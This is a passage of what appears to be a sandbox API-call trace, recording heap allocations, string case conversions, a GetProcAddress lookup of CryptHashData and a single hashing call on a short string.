[0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.287] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0246.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e38 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0246.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0246.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0246.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0246.289] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0246.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0246.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0246.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ee8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0246.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0246.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0246.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.291] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.291] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0246.291] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0246.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.292] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0246.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51100, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0246.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0246.292] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0246.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.292] CryptHashData (hHash=0xa87110, pbData=0x2e54e38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0246.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0246.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0246.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.294] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.294] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0246.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0246.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0246.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0246.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0246.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 